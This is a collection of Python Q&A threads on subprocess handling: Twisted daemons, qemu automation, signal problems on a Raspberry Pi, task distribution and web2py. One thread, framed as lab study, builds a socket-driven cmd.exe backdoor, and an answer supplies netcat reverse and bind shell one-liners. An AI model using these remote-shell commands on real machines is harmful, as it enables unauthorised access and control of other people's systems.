My plan is to provide a script, just as the title states. I've got an idea, which I'll describe below. If you think something sounds bad or misguided, I'd be grateful for any constructive comments, improvements, etc.
There are 2 services I want to start as daemons. One is required (a caching service), one is optional (HTTP access to the caching service). I use the argparse module to get the caching service port and an optional --http-port for HTTP access. I already have this and it works. Now I'd like to start the daemons. The services are based on Twisted, so they have to start the reactor loop. So far I would like to have two separate processes: one for the service and a second one for HTTP access (though I know it might be done in a single async process).
Since starting a Twisted service is done via the reactor loop (which is Python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command-line command to start the process). I can use os.fork to start the daemons and touch service.pid and http.pid files, but I don't know how to access the child PID, since os.fork returns 0 for the child.
So the child PID is what I'm missing. Moreover, if anything seems illogical or overcomplicated, please comment on that.
My current code looks like this:
#!/usr/bin/python
import argparse
import os

from twisted.internet import reactor

parser = argparse.ArgumentParser(description='Run PyCached server.')
parser.add_argument('port', metavar='port', type=int,
                    help='PyCached service port')
parser.add_argument('--http-port', metavar='http-port', type=int, default=None,
                    help='PyCached http access port')
args = parser.parse_args()


def dumpPid(name):
    f = open(name + '.pid', 'w')
    f.write(str(os.getpid()))
    f.flush()
    f.close()


def erasePid(name):
    os.remove(name + '.pid')


def run(name, port, factory):
    dumpPid(name)
    print "Starting PyCached %s on port %d" % (name, port)
    reactor.listenTCP(port, factory)
    reactor.run()
    erasePid(name)
    print "Successfully stopped PyCached %s" % (name,)


# start service (required)
fork_pid = os.fork()
if fork_pid == 0:
    from server.service import PyCachedFactory
    run('service', args.port, PyCachedFactory())
else:
    # start http access (optional)
    if args.http_port:
        fork_pid = os.fork()
        if fork_pid == 0:
            from server.http import PyCachedSite
            addr = ('localhost', args.port)
            run('http', args.http_port, PyCachedSite(addr))
        else:
            pass
I run it with:
./run.py 8001 # with main service only
or:
./run.py 8001 --http-port 8002 # with additional http
System shutdown is done via single shell script:
#!/bin/bash

function close {
    f="$1.pid"
    if [ -f "$f" ]
    then
        kill -s SIGTERM `cat "$f"`
    fi
}

close http
close service
Since starting a Twisted service is done via the reactor loop (which is Python code, not a shell script, since I don't use twistd yet), I think that using os.fork is better than subprocess (which would need a command-line command to start the process).
You should use twistd. If not, then you should write a Python script for launching the daemon. Then you should use the subprocess module (or reactor.spawnProcess) to launch the child process.
Using os.fork without immediately proceeding to one of the os.exec* functions is broken. A large amount of state is shared between the parent and child created by os.fork. You can't be sure that this sharing won't break something (and I can tell you it will break some things in Twisted).
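For illustration, here is a rough sketch of that route, assuming each daemon gets its own small launch script (the run_service.py and run_http.py names are made up for this example):

import subprocess

# launch each daemon as its own interpreter; Popen gives the parent the child PID
service = subprocess.Popen(["python", "run_service.py", "8001"])
with open("service.pid", "w") as f:
    f.write(str(service.pid))

http = subprocess.Popen(["python", "run_http.py", "--http-port", "8002"])
with open("http.pid", "w") as f:
    f.write(str(http.pid))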
Here are some links to discussions of fork-without-exec issues that might help you get more of an idea of what a troublesome area this is.
Twisted epoll reactor issues - https://twistedmatrix.com/pipermail/twisted-python/2013-October/027611.html
stdlib ssl security issues - https://mail.python.org/pipermail/python-dev/2013-October/129834.html
is twisted incompatible with multiprocessing events and queues?
multiprocessing memory usage and twisted/gevents
I'm trying to write a Python script that starts a process and does some operations afterward.
The commands that I want to automate with the script are circled in red in the picture.
The problem is that after performing the first command, the qemu environment will be running, and the other commands have to be executed inside that qemu environment. So I want to know how I can run these commands from a Python script: I know how to run the first command, but not how to issue the following commands once I am inside the qemu environment.
Could you help me automate this process?
The first thing that came to mind was pexpect; a quick search on Google turned up the blog post automatically-testing-vms-using-pexpect-and-qemu, which seems to be pretty much along the lines of what you are doing:
import sys
import pexpect

image = "fedora-20.img"
user = "root"
password = "changeme"

# Define the qemu cmd to run
# The important bit is to redirect the serial to stdio
cmd = "qemu-kvm"
cmd += " -m 1024 -serial stdio -net user -net nic"
cmd += " -snapshot -hda %s" % image
cmd += " -watchdog-action poweroff"

# Spawn the qemu process and log to stdout
child = pexpect.spawn(cmd)
child.logfile = sys.stdout

# Now wait for the login
child.expect('(?i)login:')

# And login with the credentials from above
child.sendline(user)
child.expect('(?i)password:')
child.sendline(password)
child.expect('# ')

# Now shutdown the machine and end the process
if child.isalive():
    child.sendline('init 0')
    child.close()

if child.isalive():
    print('Child did not exit gracefully.')
else:
    print('Child exited gracefully.')
You could do it with subprocess.Popen also, checking the stdout for the (qemu) lines and writing to stdin. Something roughly like this:
from subprocess import Popen, PIPE

# pass initial command as list of individual args
p = Popen(["./tracecap/temu", "-monitor", .....], stdout=PIPE, stdin=PIPE)

# store all the next arguments to pass
args = iter([arg1, arg2, arg3])

# iterate over stdout so we can check where we are
for line in iter(p.stdout.readline, ""):
    # if (qemu) is at the prompt, enter a command
    if line.startswith("(qemu)"):
        arg = next(args, "")
        # if we have used all args break
        if not arg:
            break
        # else we write the arg with a newline
        p.stdin.write(arg + "\n")
    print(line)  # just use to see the output
Where args contains all the next commands.
Don't forget that Python has batteries included. Take a look at the subprocess module in the standard library. There are a lot of pitfalls in managing processes, and the module takes care of them all.
You probably want to start a qemu process and send the next commands by writing to its standard input (stdin). The subprocess module will allow you to do that. Note that qemu has command-line options to connect to stdio: -chardev stdio,id=id
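A rough sketch of that idea follows; the qemu binary name, flags, and monitor command are illustrative and may need adjusting for your setup:

from subprocess import Popen, PIPE

# attach the qemu monitor to our stdin/stdout via a stdio chardev
p = Popen(["qemu-system-x86_64", "-chardev", "stdio,id=mon0",
           "-mon", "chardev=mon0"],
          stdin=PIPE, stdout=PIPE, universal_newlines=True)

p.stdin.write("info status\n")   # send a monitor command
p.stdin.flush()
print(p.stdout.readline())       # read the monitor's reply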
I have written a Python application, using Flask, that serves a simple website that I can use to start playback of streaming video on my Raspberry Pi (a microcomputer). Essentially, the application allows me to use my phone or tablet as a remote control.
I tested the application on Mac OS, and it works fine. After deploying it to the Raspberry Pi (with the Raspbian variant of Debian installed), it serves the website just fine, and starting playback also works as expected. But stopping the playback fails.
Relevant code is hosted here: https://github.com/lcvisser/mlbviewer-remote/blob/master/remote/mlbviewer-remote.py
The subprocess is started like this:
cmd = 'python2.7 mlbplay.py v=%s j=%s/%s/%s i=t1' % (team, mm, dd, yy)
player = subprocess.Popen(cmd, shell=True, bufsize=-1, cwd=sys.argv[1])
This works fine.
The subprocess is supposed to stop after this:
player.send_signal(signal.SIGINT)
player.communicate()
This does work on Mac OS, but it does not work on the Raspberry Pi: the application hangs until the subprocess (started as cmd) is finished by itself. It seems like SIGINT is not sent or not received by the subprocess.
Any ideas?
(I have posted this question also here: https://unix.stackexchange.com/questions/133946/application-becomes-non-responsive-to-requests-on-raspberry-pi as I don't know if this is an OS problem or if it a Python/Flask-related problem.)
UPDATE:
Trying to use player.communicate() as suggested by Jan Vlcinsky below (and after finally seeing the warning here) did not help.
I'm thinking about using the solution proposed by Jan Vlcinsky, but if Flask does not even receive the request, I don't think that would resolve the issue.
UPDATE 2:
Yesterday night I was fortunate to have a situation in which I was able to exactly pinpoint the issue. Updated the question with relevant code.
I feel like the solution of Jan Vlcinsky will just move the problem to a different application, which will keep the Flask application responsive, but will let the new application hang.
UPDATE 3:
I edited the original part of the question to remove what I now know not to be relevant.
UPDATE 4: After the comments from @shavenwarthog, the following information might be very relevant:
On Mac, mlbplay.py starts something like this:
rtmpdump <some_options_and_url> | mplayer -
When sending SIGINT to mlbplay.py, it terminates the process group created by this piped command (if I understood correctly).
On the Raspberry Pi, I'm using omxplayer, but to avoid having to change the code of mlbplay.py (which is not mine), I made a script called mplayer, with the following content:
#!/bin/bash

MLBTV_PIPE=mlbpipe

if [ ! -p $MLBTV_PIPE ]
then
    mkfifo $MLBTV_PIPE
fi

cat <&0 > $MLBTV_PIPE | omxplayer -o hdmi $MLBTV_PIPE
I'm now guessing that this last line starts a new process group, which is not terminated by the SIGINT signal, thus making my app hang. If so, I should somehow get the process group ID of this group to be able to terminate it properly. Can someone confirm this?
UPDATE 5: omxplayer does handle SIGINT:
https://github.com/popcornmix/omxplayer/blob/master/omxplayer.cpp#L131
UPDATE 6: It turns out that somehow my SIGINT transforms into a SIGTERM somewhere along the chain of commands. SIGTERM is not handled properly by omxplayer, which appears to be the problem why things keep hanging. I solved this by implementing a shell script that manages the signals and translates them to proper omxplayer commands (sort-of a lame version of what Jan suggested).
SOLUTION: The problem was in player.send_signal(). The signal was not properly handled along the chain of commands, which caused the parent app to hang. The solution is to implement wrappers for commands that don't handle the signals well.
In addition, I used Popen(cmd.split()) rather than shell=True. This works a lot better when sending signals!
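For reference, a minimal sketch of that final shape (reusing the cmd string built in the snippet below; the signal-translating wrapper scripts themselves are not shown):

import signal
import subprocess

cmd = 'python2.7 mlbplay.py v=%s j=%s/%s/%s' % (team, mm, dd, yy)
player = subprocess.Popen(cmd.split())  # no intermediate /bin/sh

# later, to stop playback: the signal now goes straight to mlbplay.py
player.send_signal(signal.SIGINT)
player.communicate()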
The problem is marked in the following snippet:
@app.route('/watch/<year>/<month>/<day>/<home>/<away>/')
def watch(year, month, day, home, away):
    global session
    global watching
    global player

    # Select video stream
    fav = config.get('favorite')
    if fav:
        fav = fav[0]  # TODO: handle multiple favorites
        if fav in (home, away):
            # Favorite team is playing
            team = fav
        else:
            # Use stream of home team
            team = home
    else:
        # Use stream of home team
        team = home

    # End session
    session = None

    # Start mlbplay
    mm = '%02i' % int(month)
    dd = '%02i' % int(day)
    yy = str(year)[-2:]
    cmd = 'python2.7 mlbplay.py v=%s j=%s/%s/%s' % (team, mm, dd, yy)
    # problem is here ----->
    player = subprocess.Popen(cmd, shell=True, cwd=sys.argv[1])
    # <----- problem is here

    # Render template
    game = {}
    game['away_code'] = away
    game['away_name'] = TEAMCODES[away][1]
    game['home_code'] = home
    game['home_name'] = TEAMCODES[home][1]
    watching = game

    return flask.render_template('watching.html', game=game)
You are starting up a new process to execute the shell command, but you do not wait until it completes. You seem to rely on the fact that only a single command-line process exists, but your frontend does not take care of that and can easily start another one.
Another problem could be that you do not call player.communicate(), so your process could block if stdout or stderr gets filled with output.
Proposed solution - split process controller from web app
You are trying to create a UI for controlling a player. For this purpose, it would be practical to split your solution into a frontend and a backend. The backend would serve as the player controller and would offer methods like
start
stop
nowPlaying
To integrate the frontend and backend, multiple options are available; one of them is zerorpc, as shown here: https://stackoverflow.com/a/23944303/346478
The advantage would be that you could very easily create other frontends (like a command-line one, or even a remote one).
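A rough sketch of what such a backend could look like with zerorpc (the method names are the ones listed above; everything else, including the endpoint, is an assumption):

import subprocess
import zerorpc

class PlayerController(object):
    def __init__(self):
        self.player = None

    def start(self, cmd):
        # launch the player without a shell so signals reach it directly
        self.player = subprocess.Popen(cmd.split())
        return self.player.pid

    def stop(self):
        if self.player is not None:
            self.player.terminate()
            self.player.communicate()
            self.player = None

    def nowPlaying(self):
        return self.player.pid if self.player is not None else None

server = zerorpc.Server(PlayerController())
server.bind("tcp://127.0.0.1:4242")
server.run()

The Flask frontend would then create a zerorpc.Client(), connect to the same endpoint, and call start/stop/nowPlaying instead of touching subprocess itself.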
One more piece of the puzzle: proc.terminate() vs send_signal.
The following code forks a 'player' (just a shell with sleep in this case), then prints its process information. It waits a moment, terminates the player, then verifies that the process is no more, it has ceased to be.
Thanks to @Jan Vlcinsky for adding the proc.communicate() to the code.
(I'm running Linux Mint LMDE, another Debian variation.)
source
# pylint: disable=E1101
import subprocess, time

def show_procs(pid):
    print 'Process Details:'
    subprocess.call(
        'ps -fl {}'.format(pid),
        shell=True,
    )

cmd = '/bin/sleep 123'
player = subprocess.Popen(cmd, shell=True)
print '* player started, PID', player.pid
show_procs(player.pid)

time.sleep(3)

print '\n*killing player'
player.terminate()
player.communicate()
show_procs(player.pid)
output
* player started, PID 20393
Process Details:
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
0 S johnm 20393 20391 0 80 0 - 1110 wait 17:30 pts/4 0:00 /bin/sh -c /bin/sleep 123
*killing player
Process Details:
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
I have two Python files communicating over a socket. When I pass the data I received to stdin.write, I get error 22, invalid argument. The code:
a="C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a ,universal_newlines = True, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = s.recv(1024) # s is the socket i created
proc.stdin.write(data) ##### ERROR in this line
output = proc.stdout.readline()
print output.rstrip()
remainder = proc.communicate()[0]
print remainder
Update
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab. This is for educational purposes. I have two machines. 1) is running Ubuntu, and I have this code on the server:
import socket, sys

s = socket.socket()
host = "192.168.2.7"  # the server's ip
port = 1234
s.bind((host, port))

s.listen(1)           # wait for client connection.
c, addr = s.accept()  # Establish connection with client.
print 'Got connection from', addr
c.send('Thank you for connecting')

while True:
    command_from_user = raw_input("Give your command: ")  # read command from the user
    if command_from_user == 'quit':
        break
    c.send(command_from_user)  # sending the command to client

c.close()  # Close the connection
And I have this code for the client:
import socket
import sys
import subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Socket created'

host = "192.168.2.7"  # ip of the server machine
port = 1234

s.connect((host, port))  # open a TCP connection to hostname on the port
print s.recv(1024)

a = "C:\python27\Tools"
proc = subprocess.Popen('cmd.exe', cwd=a, universal_newlines=True,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        stdin=subprocess.PIPE)

while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput = proc.stdout.read() + proc.stderr.read()

s.close  # closing the socket
And the error is in the client file:
Traceback (most recent call last):
  File "ex1client2.py", line 50, in <module>
    proc.stdin.write('%s\n' % data)
ValueError: I/O operation on closed file
Basically, I want to send commands one by one from the server to the client and get the output back on the server. The first command is executed; on the second command I get this error message.
The main problem which led me to this approach is the change-directory command: when I execute cd "path", the directory doesn't change.
Your new code has a different problem, which is why it raises a similar but different error. Let's look at the key part:
while True:
    data = s.recv(1024)
    if (data == "") or (data == "quit"):
        break
    proc.stdin.write('%s\n' % data)
    proc.stdin.flush()
    remainder = proc.communicate()[0]
    print remainder
    stdoutput = proc.stdout.read() + proc.stderr.read()
The problem is that each time through this loop, you're calling proc.communicate(). As the docs explain, this will:
Send data to stdin. Read data from stdout and stderr, until end-of-file is reached. Wait for process to terminate.
So, after this call, the child process has quit, and the pipes are all closed. But the next time through the loop, you try to write to its input pipe anyway. Since that pipe has been closed, you get ValueError: I/O operation on closed file, which means exactly what it says.
If you want to run each command in a separate cmd.exe shell instance, you have to move the proc = subprocess.Popen('cmd.exe', …) bit into the loop.
On the other hand, if you want to send commands one by one to the same shell, you can't call communicate; you have to write to stdin, read from stdout and stderr until you know they're done, and leave everything open for the next time through the loop.
The downside of the first one is pretty obvious: if you do a cd \Users\me\Documents in the first command, then dir in the second command, and they're running in completely different shells, you're going to end up getting the directory listing of C:\python27\Tools rather than C:\Users\me\Documents.
But the downside of the second one is pretty obvious too: you need to write code that somehow either knows when each command is done (maybe because you get the prompt again?), or that can block on proc.stdout, proc.stderr, and s all at the same time. (And without accidentally deadlocking the pipes.) And you can't even toss them all into a select, because the pipes aren't sockets. So, the only real option is to create a reader thread for stdout and another one for stderr, or to get one of the async subprocess libraries off PyPI, or to use twisted or another framework that has its own way of doing async subprocess pipes.
If you look at the source to communicate, you can see how the threading should work.
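For example, a rough sketch of the reader-thread approach (illustrative only, not a drop-in fix for your code): one thread drains each pipe so the shell stays open and the pipes never fill up and block:

import subprocess
import threading

def drain(pipe, sink):
    # read lines until the pipe closes, collecting them for the main thread
    for line in iter(pipe.readline, ''):
        sink.append(line)

proc = subprocess.Popen(['cmd.exe'], stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        universal_newlines=True)
out_lines, err_lines = [], []
for pipe, sink in ((proc.stdout, out_lines), (proc.stderr, err_lines)):
    t = threading.Thread(target=drain, args=(pipe, sink))
    t.daemon = True
    t.start()

proc.stdin.write('dir\n')  # send one command; the pipe stays open for more
proc.stdin.flush()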
Meanwhile, as a side note, your code has another very serious problem. You're expecting that each s.recv(1024) is going to return you one command. That's not how TCP sockets work. You'll get the first 2-1/2 commands in one recv, and then 1/4th of a command in the next one, and so on.
On localhost, or even a home LAN, when you're just sending a few small messages around, it will work 99% of the time, but you still have to deal with that 1% or your code will just mysteriously break sometimes. And over the internet, and even many real LANs, it will only work 10% of the time.
So, you have to implement some kind of protocol that delimits messages in some way.
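If you ever need something more general than newline-delimited commands, one common scheme is to prefix each message with its length; a rough sketch for illustration:

import struct

def send_msg(sock, data):
    # 4-byte big-endian length header, then the payload
    sock.sendall(struct.pack('!I', len(data)) + data)

def recv_msg(sock):
    # assumes the 4-byte header arrives in one piece
    header = sock.recv(4)
    if not header:
        return ''
    (length,) = struct.unpack('!I', header)
    chunks = []
    while length:
        chunk = sock.recv(length)
        if not chunk:
            break
        chunks.append(chunk)
        length -= len(chunk)
    return ''.join(chunks)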
Fortunately, for simple cases, Python gives you a very easy solution to this: makefile. When commands are delimited by newlines, and you can block synchronously until you've got a complete command, this is trivial. Instead of this:
while True:
    data = s.recv(1024)
… just do this:
f = s.makefile()
while True:
    data = f.readline()
You just need to remember to close both f and s later (or s right after the makefile, and f later). A more idiomatic use is:
with s.makefile() as f:
    s.close()
    for data in f:
One last thing:
OK, basically I want to create something like a backdoor on a system, in a localhost inside a network lab
"localhost" means the same machine you're running one, so "a localhost inside a network lab" doesn't make sense. I assume you just meant "host" here, in which case the whole thing makes sense.
If you don't need to use Python, you can do this whole thing with a one-liner using netcat. There are a few different versions with slightly different syntax. I believe Ubuntu comes with GNU netcat built-in; if not, it's probably installable with apt-get install netcat or apt-get install nc. Windows doesn't come with anything, but you can get ports of almost any variant.
A quick google for "netcat remote shell" turned up a bunch of blog posts, forum messages, and even videos showing how to do this, such as Using Netcat To Spawn A Remote Shell, but you're probably better off googling for netcat tutorials instead.
The more usual design is to have the "backdoor" machine (your Windows box) listen on a port, and the other machine (your Ubuntu box) connect to it, so that's what most of the blog posts/etc. will show you. The advantage of this direction is that your backdoor server listens forever: you can connect up, do some stuff, quit, connect up again later, etc. without having to go back to the Windows box and start a new connection.
But the other way around, with a backdoor client on the Windows box, is just as easy. On your Ubuntu box, start a server that just connects the terminal to the first connection that comes in:
nc -l -p 1234
Then on your Windows box, make a connection to that server, and connect it up to cmd.exe. Assuming you've installed a GNU-syntax variant:
nc -e cmd.exe 192.168.2.7 1234
That's it. A lot simpler than writing it in Python.
For the more typical design, the backdoor server on Windows runs this:
nc -k -l -p 1234 -e cmd.exe
And then you connect up from Ubuntu with:
nc windows.machine.address 1234
Or you can even add -t to the backdoor server, and just connect up with telnet instead of nc.
The problem is that you're not actually opening a subprocess at all, so the pipe is getting closed, so you're trying to write to something that doesn't exist. (I'm pretty sure POSIX guarantees that you'll get an EPIPE here, but on Windows, subprocess isn't using a POSIX pipe in the first place, so there's no guarantee of exactly what you're going to get. But you're definitely going to get some error.)
And the reason that happens is that you're trying to open a program named '\n' (as in a newline, not a backslash and an n). I don't think that's even legal on Windows. And, even if it is, I highly doubt you have an executable named '\n.exe' or the like on your path.
This would be much easier to see if you weren't using shell=True. In that case, the Popen itself would raise an exception (an ENOENT), which would tell you something like:
OSError: [Errno 2] No such file or directory: '
'
… which would be much easier to understand.
In general, you should not be using shell=True unless you really need some shell feature. And it's very rare that you need a shell feature and also need to manually read and write the pipes.
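For illustration, the same cmd.exe launch without the shell just passes the program directly (a sketch, reusing the cwd variable a from the question):

proc = subprocess.Popen(['cmd.exe'], cwd=a, universal_newlines=True,
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE)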
It would also be less confusing if you didn't reuse data to mean two completely different things (the name of the program to run, and the data to pass from the socket to the pipe).
I have Python code that takes a bunch of tasks and distributes them to either different threads or different nodes on a cluster. I always end up writing a main driver script, driver.py, that takes two command-line arguments: --run-all and --run-task. The first is just a wrapper that iterates through all tasks and then calls driver.py --run-task with each task passed as an argument. Example:
== driver.py ==
# Determine the current script
DRIVER = os.path.abspath(__file__)

(opts, args) = parser.parse_args()

if opts.run_all is not None:
    # Run all tasks
    for task in opts.run_all.split(","):
        # Call driver.py again with a specific task
        cmd = "python %s --run-task %s" % (DRIVER, task)
        # Execute on system
        distribute_cmd(cmd)
elif opts.run_task is not None:
    # Run on an individual task
    # code here for processing a task...
The user would then call:
$ driver.py --run-all task1,task2,task3,task4
And each task would get distributed.
The function distribute_cmd takes a shell-executable command and sends it, in a system-specific way, to either a node or a thread. The reason driver.py has to find its own name and call itself is that distribute_cmd needs an executable shell command; it cannot take, for example, a function name.
This consideration led me to this design of a driver script that has two modes and has to call itself. This has two complications: (1) the script has to find out its own path via __file__, and (2) when making this into a Python package, it's unclear where driver.py should go. It's meant to be an executable script, but if I put it in setup.py's scripts=, then I will have to find out where the scripts live (see correct way to find scripts directory from setup.py in Python distutils?). This does not seem to be a good solution.
What's an alternative design to this? Keep in mind that the distribution of tasks has to result in an executable command that can be passed as a string to distribute_cmd. Thanks.
What you are looking for is a library that already does exactly what you need, e.g. Fabric or Celery.
If you were not using nodes, I would suggest using multiprocessing.
This is a slightly similar question to this one.
To be able to execute remotely, you either need:
ssh access to the box, in that case you can use Fabric to send your commands.
a server, SocketServer, tcp server, or anything that will accept connections.
an agent, or client, that will wait for data. If you are using an agent, you may as well use a broker for your messages. Celery allows you to do some of the plumbing: one end puts messages on the queue while the other end gets messages from the queue. If the message is a command to execute, then the agent can do an os.system() call, or call subprocess.Popen().
celery example:
import os
from celery import Celery

celery = Celery('tasks', broker='amqp://guest@localhost//')

@celery.task
def run_command(command):
    return os.system(command)
You will then need a worker that binds on the queue and waits for tasks to execute. More info in the documentation.
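For completeness, a rough sketch of how the driver side might queue work for such a worker (this assumes the snippet above is saved as tasks.py; configure a result backend if you want to read return values back):

from tasks import run_command

# queue one shell command per task; whichever worker is free picks it up
for task in ["task1", "task2", "task3"]:
    run_command.delay("python driver.py --run-task %s" % task)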
fabric example:
the code:
from fabric.api import run

def exec_remotely(command):
    run(command)
the invocation:
$ fab exec_remotely:command='ls -lh'
More info in the documentation.
batch system case:
To go back to the question...
distribute_cmd is something that would call bsub somescript.sh
you need to find the file only because you are going to re-execute the same script with other parameters
because of the above, you might have a problem providing a correct distutils script.
Let's question this design.
Why do you need to use the same script?
Can your driver write scripts and then call bsub?
Can you use temporary files?
Do all the nodes actually share a filesystem?
How do you know the file is going to exist on the node?
example:
TASK_CODE = {
    'TASK1': '''#!/usr/bin/env python
#... actual code for task1 goes here ...
''',
    'TASK2': '''#!/usr/bin/env python
#... actual code for task2 goes here ...
'''}

# driver portion
(opts, args) = parser.parse_args()

if opts.run_all is not None:
    for task in opts.run_all.split(","):
        task_path = '/tmp/taskfile_%s' % task
        with open(task_path, 'w') as task_file:
            task_file.write(TASK_CODE[task])
            # note: should probably do better error handling.
        distribute_cmd(task_path)
I've got an Apache2/web2py server running using the wsgi handler functionality. Within one of the controllers, I am trying to run an external executable to perform some processing on 2 files.
My approach to this is to use the subprocess module to kick off the executable. I have simplified the code to a bare-bones implementation with little success.
from subprocess import *
p = Popen(("echo", "Hello"), shell=False)
ret = p.wait()
print "Process ended with status %s" % ret
When running the above code on its own (creating a new file and running it via the python command line), it works exactly as expected.
However, as soon as I place the exact same code into my web2py controller, the external process stops working. Instead of the process returning with code 0 as is expected in the above example, it always returns -6 and "Hello" is not printed to stdout.
After doing some digging, I found that negative results from p.wait() imply that a signal caused the process to end abnormally. And, according to some docs I found, -6 corresponds to the SIGABRT signal.
I would have expected this signal to be a result of some poorly executed code in my child process. However, since this is only running echo (and since it works outside of web2py) I have my doubts that the child process is signalling itself.
Is there some web2py limitation/configuration that causes Popen() requests to always fail? If so, how can I modify my logic so that the controller (or whatever) is actually able to spawn this external process?
** EDIT: It looks like web2py applications may not like the subprocess module. According to a reply to a message in the web2py email group:
"You should not use subprocess in a web2py application (if you really need too, look into the admin/controllers/shell.py) but you can use it in a web2py program running from shell (web2py.py -R myprogram.py)."
I will be checking out some options based on the note here and see if any solution presents itself.
In the end, the best I was able to come up with involved setting up a simple XML RPC server and call the functions from that:
my_server.py
#my_server.py
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from subprocess import *

def echo_fn():
    p = Popen(("echo", "hello"), shell=False)
    ret = p.wait()
    print "Process ended with status %s" % ret
    return True  # RPC Server doesn't like to return None

def main():
    server = SimpleXMLRPCServer(("localhost", 12345), SimpleXMLRPCRequestHandler)
    server.register_function(echo_fn, "echo_fn")
    while True:
        server.handle_request()

if __name__ == "__main__":
    main()
web2py_controller.py
#web2py_controller.py
import xmlrpclib

def run_echo():
    proc_srvr = xmlrpclib.ServerProxy("http://localhost:12345")
    proc_srvr.echo_fn()
I'll be honest: I'm not a Python or SimpleXMLRPCServer guru, so the overall code may not be up to best-practice standards. However, going this route did allow me to, in effect, call a subprocess from a controller in web2py.
(Note, this was a quick and dirty simplification of the code that I have in my project. I have not validated it is in a working state, so it may require some tweaks.)